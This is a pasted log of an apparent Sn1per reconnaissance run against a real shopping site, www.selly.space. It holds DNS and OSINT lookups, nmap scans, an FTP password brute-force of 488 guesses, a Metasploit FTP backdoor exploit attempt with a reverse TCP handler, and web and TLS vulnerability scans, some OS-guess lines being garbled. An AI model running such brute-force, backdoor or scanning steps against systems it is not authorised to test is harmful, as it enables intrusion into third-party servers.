· 8 years ago · Oct 23, 2017, 11:20 PM
1Server: 75.75.75.75
2Address: 75.75.75.75#53
3
4Non-authoritative answer:
5www.selly.space canonical name = selly.space.
6Name: selly.space
7Address: 45.34.7.20
8
9www.selly.space is an alias for selly.space.
10selly.space has address 45.34.7.20
11selly.space mail is handled by 0 selly.space.
12 + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
13
14Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
15
16[+] Target is www.selly.space
17[+] Loading modules.
18[+] Following modules are loaded:
19[x] [1] ping:icmp_ping - ICMP echo discovery module
20[x] [2] ping:tcp_ping - TCP-based ping discovery module
21[x] [3] ping:udp_ping - UDP-based ping discovery module
22[x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
23[x] [5] infogather:portscan - TCP and UDP PortScanner
24[x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
25[x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
26[x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
27[x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
28[x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
29[x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
30[x] [12] fingerprint:smb - SMB fingerprinting module
31[x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
32[+] 13 modules registered
33[+] Initializing scan engine
34[+] Running scan engine
35[-] ping:tcp_ping module: no closed/open TCP ports known on 45.34.7.20. Module test failed
36[-] ping:udp_ping module: no closed/open UDP ports known on 45.34.7.20. Module test failed
37[-] No distance calculation. 45.34.7.20 appears to be dead or no ports known
38[+] Host: 45.34.7.20 is up (Guess probability: 50%)
39[+] Target: 45.34.7.20 is alive. Round-Trip Time: 0.48291 sec
40[+] Selected safe Round-Trip Time value is: 0.96582 sec
41[-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
42[-] fingerprint:smb need either TCP port 139 or 445 to run
43[-] fingerprint:snmp: need UDP port 161 open
44[+] Primary guess:
45[+] Host 45.34.7.20 Running OS: `��ZV (Guess probability: 100%)
46[+] Other guesses:
47[+] Host 45.34.7.20 Running OS: (Guess probability: 100%)
48[+] Host 45.34.7.20 Running OS: (Guess probability: 100%)
49[+] Host 45.34.7.20 Running OS: (Guess probability: 100%)
50[+] Host 45.34.7.20 Running OS: `��ZV (Guess probability: 100%)
51[+] Host 45.34.7.20 Running OS: (Guess probability: 100%)
52[+] Host 45.34.7.20 Running OS: `��ZV (Guess probability: 100%)
53[+] Host 45.34.7.20 Running OS: (Guess probability: 100%)
54[+] Host 45.34.7.20 Running OS: (Guess probability: 100%)
55[+] Host 45.34.7.20 Running OS: (Guess probability: 100%)
56[+] Cleaning up scan engine
57[+] Modules deinitialized
58[+] Execution completed.
59 + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
60DOMAIN NOT FOUND
61 + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
62[-] Searching in Bing:
63 Searching 50 results...
64 Searching 100 results...
65
66
67[+] Emails found:
68------------------
69No emails found
70
71[+] Hosts found in search engines:
72------------------------------------
73No hosts found
74 + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
75
76; <<>> DiG 9.10.3-P4-Debian <<>> -x www.selly.space
77;; global options: +cmd
78;; Got answer:
79;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 58537
80;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
81
82;; QUESTION SECTION:
83;space.selly.www.in-addr.arpa. IN PTR
84
85;; AUTHORITY SECTION:
86in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043316 1800 900 604800 3600
87
88;; Query time: 95 msec
89;; SERVER: 75.75.75.75#53(75.75.75.75)
90;; WHEN: Mon Oct 23 15:09:52 MDT 2017
91;; MSG SIZE rcvd: 114
92
93Smartmatch is experimental at /usr/bin/dnsenum line 698.
94Smartmatch is experimental at /usr/bin/dnsenum line 698.
95dnsenum VERSION:1.2.4
96
97----- www.selly.space -----
98
99
100Host's addresses:
101__________________
102
103selly.space. 14387 IN A 45.34.7.20
104
105
106Name Servers:
107______________
108
109ns4.private-rack.com. 300 IN A 23.227.178.11
110ns3.private-rack.com. 14400 IN A 23.227.190.20
111ns1.private-rack.com. 300 IN A 192.211.53.160
112ns2.private-rack.com. 14387 IN A 96.44.164.50
113
114
115Mail (MX) Servers:
116___________________
117
118selly.space. 14386 IN A 45.34.7.20
119
120
121Trying Zone Transfers and getting Bind Versions:
122_________________________________________________
123
124
125Trying Zone Transfer for www.selly.space on ns1.private-rack.com ...
126AXFR record query failed: NOTIMP
127
128Trying Zone Transfer for www.selly.space on ns4.private-rack.com ...
129AXFR record query failed: NOTIMP
130
131Trying Zone Transfer for www.selly.space on ns3.private-rack.com ...
132AXFR record query failed: NOTIMP
133
134Trying Zone Transfer for www.selly.space on ns2.private-rack.com ...
135AXFR record query failed: NOTIMP
136
137brute force file not specified, bay.
138[-] Enumerating subdomains now for www.selly.space
139[-] verbosity is enabled, will show the subdomains results in realtime
140[-] Searching now in Baidu..
141[-] Searching now in Yahoo..
142[-] Searching now in Google..
143[-] Searching now in Bing..
144[-] Searching now in Ask..
145[-] Searching now in Netcraft..
146[-] Searching now in DNSdumpster..
147[-] Searching now in Virustotal..
148[-] Searching now in ThreatCrowd..
149[-] Searching now in SSL Certificates..
150[-] Searching now in PassiveDNS..
151
152+ -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
153 + -- ----------------------------=[Checking Email Security]=----------------- -- +
154
155 + -- ----------------------------=[Pinging host]=---------------------------- -- +
156PING selly.space (45.34.7.20) 56(84) bytes of data.
15764 bytes from dal.if1.us (45.34.7.20): icmp_seq=1 ttl=52 time=39.1 ms
158
159--- selly.space ping statistics ---
1601 packets transmitted, 1 received, 0% packet loss, time 0ms
161rtt min/avg/max/mdev = 39.197/39.197/39.197/0.000 ms
162
163 + -- ----------------------------=[Running TCP port scan]=------------------- -- +
164
165Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 15:10 MDT
166Nmap scan report for www.selly.space (45.34.7.20)
167Host is up (1.8s latency).
168rDNS record for 45.34.7.20: dal.if1.us
169Not shown: 338 filtered ports, 123 closed ports
170Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
171PORT STATE SERVICE
17221/tcp open ftp
17353/tcp open domain
17480/tcp open http
175110/tcp open pop3
176143/tcp open imap
177443/tcp open https
178465/tcp open smtps
179587/tcp open submission
180993/tcp open imaps
181995/tcp open pop3s
1823306/tcp open mysql
1837080/tcp open empowerid
184
185Nmap done: 1 IP address (1 host up) scanned in 6.20 seconds
186
187 + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
188 + -- --=[Port 21 opened... running tests...
189
190Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 15:10 MDT
191Nmap scan report for www.selly.space (45.34.7.20)
192Host is up (0.048s latency).
193rDNS record for 45.34.7.20: dal.if1.us
194
195PORT STATE SERVICE VERSION
19621/tcp open ftp Pure-FTPd
197| ftp-brute:
198| Accounts: No valid accounts found
199|_ Statistics: Performed 488 guesses in 185 seconds, average tps: 2.4
200Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
201Device type: bridge|general purpose
202Running (JUST GUESSING): Oracle Virtualbox (98%), QEMU (93%)
203OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu
204Aggressive OS guesses: Oracle Virtualbox (98%), QEMU user mode network gateway (93%)
205No exact OS matches for host (test conditions non-ideal).
206Network Distance: 2 hops
207
208TRACEROUTE (using port 21/tcp)
209HOP RTT ADDRESS
2101 3.66 ms 10.0.2.2
2112 57.68 ms dal.if1.us (45.34.7.20)
212
213OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
214Nmap done: 1 IP address (1 host up) scanned in 193.96 seconds
215[-] Failed to connect to the database: could not connect to server: Connection refused
216 Is the server running on host "localhost" (::1) and accepting
217 TCP/IP connections on port 5432?
218could not connect to server: Connection refused
219 Is the server running on host "localhost" (127.0.0.1) and accepting
220 TCP/IP connections on port 5432?
221
222 RHOST => www.selly.space
223RHOSTS => www.selly.space
224[*] www.selly.space:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
225220-You are user number 4 of 50 allowed.
226220-Local time is now 16:14. Server port: 21.
227220-This is a private system - No anonymous login
228220-IPv6 connections are also welcome on this server.
229220 You will be disconnected after 15 minutes of inactivity.
230[*] www.selly.space:21 - USER: 331 User niey9X:) OK. Password required
231[*] Exploit completed, but no session was created.
232[*] Started reverse TCP double handler on 10.0.2.15:4444
233[*] www.selly.space:21 - Sending Backdoor Command
234[*] Exploit completed, but no session was created.
235 + -- --=[Port 22 closed... skipping.
236 + -- --=[Port 23 closed... skipping.
237 + -- --=[Port 25 closed... skipping.
238 + -- --=[Port 53 opened... running tests...
239
240Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 15:15 MDT
241Nmap scan report for www.selly.space (45.34.7.20)
242Host is up (0.24s latency).
243rDNS record for 45.34.7.20: dal.if1.us
244
245PORT STATE SERVICE VERSION
24653/udp open domain dnsmasq 2.76
247| dns-cache-snoop: 94 of 100 tested domains are cached.
248| google.com
249| www.google.com
250| facebook.com
251| www.facebook.com
252| youtube.com
253| www.youtube.com
254| yahoo.com
255| www.yahoo.com
256| baidu.com
257| www.baidu.com
258| wikipedia.org
259| www.wikipedia.org
260| amazon.com
261| www.amazon.com
262| qq.com
263| www.qq.com
264| live.com
265| www.live.com
266| linkedin.com
267| www.linkedin.com
268| twitter.com
269| www.twitter.com
270| www.blogspot.com
271| taobao.com
272| www.taobao.com
273| google.co.in
274| www.google.co.in
275| bing.com
276| www.bing.com
277| yahoo.co.jp
278| www.yahoo.co.jp
279| yandex.ru
280| www.yandex.ru
281| wordpress.com
282| www.wordpress.com
283| www.sina.com.cn
284| vk.com
285| www.vk.com
286| ebay.com
287| www.ebay.com
288| google.de
289| www.google.de
290| tumblr.com
291| www.tumblr.com
292| msn.com
293| www.msn.com
294| google.co.uk
295| www.google.co.uk
296| www.googleusercontent.com
297| ask.com
298| www.ask.com
299| mail.ru
300| google.com.br
301| www.google.com.br
302| 163.com
303| www.163.com
304| google.fr
305| www.google.fr
306| pinterest.com
307| www.pinterest.com
308| www.google.com.hk
309| hao123.com
310| www.hao123.com
311| microsoft.com
312| www.microsoft.com
313| google.co.jp
314| www.google.co.jp
315| xvideos.com
316| www.xvideos.com
317| google.ru
318| www.google.ru
319| weibo.com
320| www.weibo.com
321| craigslist.org
322| www.craigslist.org
323| paypal.com
324| www.paypal.com
325| instagram.com
326| www.instagram.com
327| amazon.co.jp
328| www.amazon.co.jp
329| google.it
330| www.google.it
331| imdb.com
332| www.imdb.com
333| blogger.com
334| www.blogger.com
335| google.es
336| www.google.es
337| apple.com
338| www.apple.com
339| www.conduit.com
340| sohu.com
341|_www.sohu.com
342|_dns-fuzz: The server seems impervious to our assault.
343| dns-nsec-enum:
344|_ No NSEC records found
345| dns-nsec3-enum:
346|_ DNSSEC NSEC3 not supported
347| dns-nsid:
348| id.server: dnvr-cns03
349|_ bind.version: dnsmasq-2.76
350|_dns-random-srcport: 76.96.47.195 is GREAT: 51 queries in 2.1 seconds from 46 ports with std dev 18503
351|_dns-random-txid: 76.96.47.199 is GREAT: 51 queries in 2.1 seconds from 51 txids with std dev 20168
352|_dns-recursion: Recursion appears to be enabled
353Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
354Aggressive OS guesses: Agfa DryStar 5500 printer (98%), D-Link DP-300U, DP-G310, or Hamlet HPS01UU print server (98%), Tahoe 8216 power management system (98%), Linux 1.0.9 (98%), TRENDnet TV-IP100 webcam (97%), D-Link DIR-655 (96%), OUYA game console (96%), SiliconDust HDHomeRun 3 set top box (96%), Silicondust HDHomeRun set top box (96%), SiliconDust HDHomeRun set top box (96%)
355No exact OS matches for host (test conditions non-ideal).
356Network Distance: 2 hops
357
358Host script results:
359| dns-brute:
360| DNS Brute-force hostnames:
361| www.selly.space - 45.34.7.20
362| mail.selly.space - 45.34.7.20
363|_ ftp.selly.space - 45.34.7.20
364
365TRACEROUTE (using port 53/udp)
366HOP RTT ADDRESS
3671 1.93 ms 10.0.2.2
3682 567.75 ms dal.if1.us (45.34.7.20)
369
370OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
371Nmap done: 1 IP address (1 host up) scanned in 606.16 seconds
372 + -- --=[Port 79 closed... skipping.
373 + -- --=[Port 80 opened... running tests...
374 + -- ----------------------------=[Checking for WAF]=------------------------ -- +
375
376
377Checking http://www.selly.space
378Generic Detection results:
379No WAF detected by the generic detection
380Number of requests: 14
381
382 + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
383http://www.selly.space [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[LiteSpeed], IP[45.34.7.20], JQuery[1.11.0], LiteSpeed, Meta-Author[Selly.Space Team], PHP[5.6.31], PasswordField[phps_passwd], Script[text/javascript], Title[Selly.Space], X-Powered-By[PHP/5.6.31]
384
385+ -- --=[Target: www.selly.space:80
386+ -- --=[Site not vulnerable to Cross-Site Tracing!
387+ -- --=[Site not vulnerable to Host Header Injection!
388+ -- --=[Site vulnerable to Cross-Frame Scripting!
389+ -- --=[Site vulnerable to Clickjacking!
390
391HTTP/1.1 200 OK
392X-Powered-By: PHP/5.6.31
393Set-Cookie: PHPSESSID=d3j8igp39mllsi8pq3m0hqs4a4; path=/
394Expires: Thu, 19 Nov 1981 08:52:00 GMT
395Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
396Pragma: no-cache
397Content-Type: text/html; charset=UTF-8
398Content-Length: 8444
399Date: Mon, 23 Oct 2017 21:25:46 GMT
400Accept-Ranges: bytes
401Server: LiteSpeed
402Connection: Keep-Alive
403
404 <!DOCTYPE html>
405<html lang="en">
406 <head>
407 <meta charset="utf-8">
408 <title>Selly.Space</title>
409 <meta name="viewport" content="width=device-width, initial-scale=1.0">
410 <meta name="description" content="The number one virtual shop to sell your products!">
411 <meta name="author" content="Selly.Space Team">
412 <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet">
413
414
415 <!-- Stylesheets -->
416 <link rel="stylesheet" href="https://selly.space/static/gen/modal/css/style.css" />
417 <link rel="stylesheet" href="https://selly.space/static/gen/elements.css">
418
419HTTP/1.1 200 OK
420X-Powered-By: PHP/5.6.31
421Set-Cookie: PHPSESSID=1f7o9smc9qmeq8el4e0d5fe1k1; path=/
422Expires: Thu, 19 Nov 1981 08:52:00 GMT
423Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
424Pragma: no-cache
425Content-Type: text/html; charset=UTF-8
426Transfer-Encoding: chunked
427Date: Mon, 23 Oct 2017 21:25:46 GMT
428Accept-Ranges: bytes
429Server: LiteSpeed
430Connection: Keep-Alive
431
4322000
433 <!DOCTYPE html>
434<html lang="en">
435 <head>
436 <meta charset="utf-8">
437 <title>Selly.Space</title>
438 <meta name="viewport" content="width=device-width, initial-scale=1.0">
439 <meta name="description" content="The number one virtual shop to sell your products!">
440 <meta name="author" content="Selly.Space Team">
441 <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet">
442
443
444 <!-- Stylesheets -->
445 <link rel="stylesheet" href="https://selly.space/static/gen/modal/css/style.css" />
446 <link rel="stylesheet" href="https://selly.space/static/gen/elemen
447
448
449
450 + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
451+ -- --=[Checking if X-Content options are enabled on www.selly.space...
452
453+ -- --=[Checking if X-Frame options are enabled on www.selly.space...
454
455+ -- --=[Checking if X-XSS-Protection header is enabled on www.selly.space...
456
457+ -- --=[Checking HTTP methods on www.selly.space...
458
459+ -- --=[Checking if TRACE method is enabled on www.selly.space...
460
461+ -- --=[Checking for META tags on www.selly.space...
462 <meta charset="utf-8">
463 <meta name="viewport" content="width=device-width, initial-scale=1.0">
464 <meta name="description" content="The number one virtual shop to sell your products!">
465 <meta name="author" content="Selly.Space Team">
466 <meta name="msapplication-TileColor" content="#2b5797">
467 <meta name="msapplication-TileImage" content="https://selly.space/static/favicons/mstile-144x144.png">
468
469+ -- --=[Checking for open proxy on www.selly.space...
470<html><head><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
471
472+ -- --=[Enumerating software on www.selly.space...
473X-Powered-By: PHP/5.6.31
474Set-Cookie: PHPSESSID=v5pl5h6urh8lfcq4q4npm4i2r3; path=/
475Server: LiteSpeed
476
477+ -- --=[Checking if Strict-Transport-Security is enabled on www.selly.space...
478
479+ -- --=[Checking for Flash cross-domain policy on www.selly.space...
480<head><title> 404 Not Found
481</title></head>
482<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
483<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
484 <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>
485<h2 style="margin-top:20px;font-size: 30px;">Not Found
486</h2>
487<p>The resource requested could not be found on this server!</p>
488</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
489<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
490
491+ -- --=[Checking for Silverlight cross-domain policy on www.selly.space...
492<head><title> 404 Not Found
493</title></head>
494<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
495<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
496 <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>
497<h2 style="margin-top:20px;font-size: 30px;">Not Found
498</h2>
499<p>The resource requested could not be found on this server!</p>
500</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
501<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
502
503+ -- --=[Checking for HTML5 cross-origin resource sharing on www.selly.space...
504
505+ -- --=[Retrieving robots.txt on www.selly.space...
506User-agent: *
507Crawl-Delay: 20
508
509+ -- --=[Retrieving sitemap.xml on www.selly.space...
510<head><title> 404 Not Found
511</title></head>
512<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
513<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
514 <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>
515<h2 style="margin-top:20px;font-size: 30px;">Not Found
516</h2>
517<p>The resource requested could not be found on this server!</p>
518</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;">
519<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
520
521+ -- --=[Checking cookie attributes on www.selly.space...
522Set-Cookie: PHPSESSID=rl1go509re3kirqgcakg0l4bg1; path=/
523
524+ -- --=[Checking for ASP.NET Detailed Errors on www.selly.space...
525<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
526<br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
527
528
529 + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
530- Nikto v2.1.6
531---------------------------------------------------------------------------
532+ Target IP: 45.34.7.20
533+ Target Hostname: www.selly.space
534+ Target Port: 80
535+ Start Time: 2017-10-23 15:25:52 (GMT-6)
536---------------------------------------------------------------------------
537+ Server: LiteSpeed
538+ Retrieved x-powered-by header: PHP/5.6.31
539+ The anti-clickjacking X-Frame-Options header is not present.
540+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
541+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
542+ Cookie PHPSESSID created without the httponly flag
543+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
544+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
545+ End Time: 2017-10-23 15:26:21 (GMT-6) (29 seconds)
546---------------------------------------------------------------------------
547+ 1 host(s) tested
548 + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
549[+] Screenshot saved to /usr/share/sniper/loot/screenshots/www.selly.space-port80.jpg
550 + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
551 + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
552
553 _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
554 (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
555 (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
556 \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
557 \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
558 /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
559 [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
560
561__[ ! ] Neither war between hackers, nor peace for the system.
562__[ ! ] http://blog.inurl.com.br
563__[ ! ] http://fb.com/InurlBrasil
564__[ ! ] http://twitter.com/@googleinurl
565__[ ! ] http://github.com/googleinurl
566__[ ! ] Current PHP version::[ 7.0.22-3 ]
567__[ ! ] Current script owner::[ root ]
568__[ ! ] Current uname::[ Linux kali 4.12.0-kali1-amd64 #1 SMP Debian 4.12.6-1kali6 (2017-08-30) x86_64 ]
569__[ ! ] Current pwd::[ /usr/share/sniper ]
570__[ ! ] Help: php inurlbr.php --help
571------------------------------------------------------------------------------------------------------------------------
572[ INFO ] INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install
573 + -- --=[Port 110 opened... running tests...
574
575Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 15:28 MDT
576Nmap scan report for www.selly.space (45.34.7.20)
577Host is up (0.00079s latency).
578rDNS record for 45.34.7.20: dal.if1.us
579
580PORT STATE SERVICE VERSION
581110/tcp filtered pop3
582Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
583Aggressive OS guesses: Agfa DryStar 5500 printer (97%), D-Link DP-300U, DP-G310, or Hamlet HPS01UU print server (97%), Tahoe 8216 power management system (97%), TRENDnet TV-IP100 webcam (97%), Linux 1.0.9 (97%), D-Link DIR-655 (95%), OUYA game console (95%), SiliconDust HDHomeRun 3 set top box (95%), Silicondust HDHomeRun set top box (95%), SiliconDust HDHomeRun set top box (95%)
584No exact OS matches for host (test conditions non-ideal).
585Network Distance: 2 hops
586
587TRACEROUTE (using port 80/tcp)
588HOP RTT ADDRESS
5891 0.71 ms 10.0.2.2
5902 0.32 ms dal.if1.us (45.34.7.20)
591
592OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
593Nmap done: 1 IP address (1 host up) scanned in 5.67 seconds
594 + -- --=[Port 111 closed... skipping.
595 + -- --=[Port 135 closed... skipping.
596 + -- --=[Port 139 closed... skipping.
597 + -- --=[Port 161 closed... skipping.
598 + -- --=[Port 162 closed... skipping.
599 + -- --=[Port 389 closed... skipping.
600 + -- --=[Port 443 opened... running tests..
601Checking https://www.selly.space
602ERROR:root:Site https://www.selly.space appears to be down
603
604 + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
605Traceback (most recent call last):
606 File "cloudfail.py", line 9, in <module>
607 import colorama
608ImportError: No module named 'colorama'
609 + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
610/usr/share/whatweb/lib/target.rb:189: warning: constant ::TimeoutError is deprecated
611https://www.selly.space ERROR: Connection reset by peer - SSL_connect
612
613 + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
614Usage: sslyze [options] target1.com target2.com:443 target3.com:443{ip} etc...
615
616sslyze: error: --certinfo option does not take a value
617Version: 1.11.10-static
618OpenSSL 1.0.2-chacha (1.0.2g-dev)
619
620Testing SSL server www.selly.space on port 443 using SNI name www.selly.space
621
622 TLS Fallback SCSV:
623Server does not support TLS Fallback SCSV
624
625 TLS renegotiation:
626Session renegotiation not supported
627
628 TLS Compression:
629Compression disabled
630
631 Heartbleed:
632TLS 1.2 not vulnerable to heartbleed
633TLS 1.1 not vulnerable to heartbleed
634TLS 1.0 not vulnerable to heartbleed
635
636 Supported Server Cipher(s):
637
638###########################################################
639 testssl 2.9dev from https://testssl.sh/dev/
640
641 This program is free software. Distribution and
642 modification under GPLv2 permitted.
643 USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
644
645 Please file bugs @ https://testssl.sh/bugs/
646
647###########################################################
648
649 Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
650 on kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
651 (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
652
653
654 Start 2017-10-23 15:29:06 -->> 45.34.7.20:443 (www.selly.space) <<--
655
656 rDNS (45.34.7.20): dal.if1.us.
657
658 45.34.7.20:443 doesn't seem to be a TLS/SSL enabled server
659 The results might look ok but they could be nonsense. Really proceed ? ("yes" to continue) --> yes
660 Service detected: HTTP
661
662
663 Testing protocols via sockets except SPDY+HTTP2
664
665 SSLv2 not offered (OK)
666 SSLv3 not offered (OK)
667 TLS 1 offered
668 TLS 1.1 offered
669 TLS 1.2 offered (OK)
670 SPDY/NPN h2, spdy/3.1, spdy/3, spdy/2, http/1.1 (advertised)
671 HTTP2/ALPN h2, spdy/3.1, http/1.1, spdy/2, spdy/3 (offered)
672
673 Testing ~standard cipher categories
674
675 NULL ciphers (no encryption) not offered (OK)
676 Anonymous NULL Ciphers (no authentication) not offered (OK)
677 Export ciphers (w/o ADH+NULL) not offered (OK)
678 LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
679 Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
680 Triple DES Ciphers (Medium) offered
681 High encryption (AES+Camellia, no AEAD) offered (OK)
682 Strong encryption (AEAD ciphers) offered (OK)
683
684
685 Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
686
687 PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
688 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
689 ECDHE-RSA-CHACHA20-POLY1305
690 ECDHE-RSA-AES128-GCM-SHA256
691 ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
692 Elliptic curves offered: prime256v1
693
694
695 Testing server preferences
696
697 Has server cipher order? yes (OK)
698 Negotiated protocol TLSv1.2
699 Negotiated cipher ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
700 Cipher order
701 TLSv1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA AES128-SHA AES256-SHA
702 DES-CBC3-SHA
703 TLSv1.1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA AES128-SHA AES256-SHA
704 DES-CBC3-SHA
705 TLSv1.2: ECDHE-RSA-CHACHA20-POLY1305 ECDHE-RSA-AES128-GCM-SHA256
706 ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-SHA256
707 ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES128-SHA
708 ECDHE-RSA-AES256-SHA AES128-GCM-SHA256 AES256-GCM-SHA384
709 AES128-SHA256 AES256-SHA256 AES128-SHA AES256-SHA DES-CBC3-SHA
710
711
712 Testing server defaults (Server Hello)
713
714 TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
715 "status request/#5" "next protocol/#13172"
716 "EC point formats/#11"
717 "extended master secret/#23"
718 "application layer protocol negotiation/#16"
719 Session Ticket RFC 5077 hint (no lifetime advertised)
720 SSL Session ID support yes
721 Session Resumption Tickets: yes, ID: yes
722 TLS clock skew -1 sec from localtime
723 Signature Algorithm SHA256 with RSA
724 Server key size RSA 2048 bits
725 Fingerprint / Serial SHA1 85456F3205692182AFA6D778F1C5BDE06CF72B78 / 0447A69A7CA292E90A8C79876224E0E2FA2B
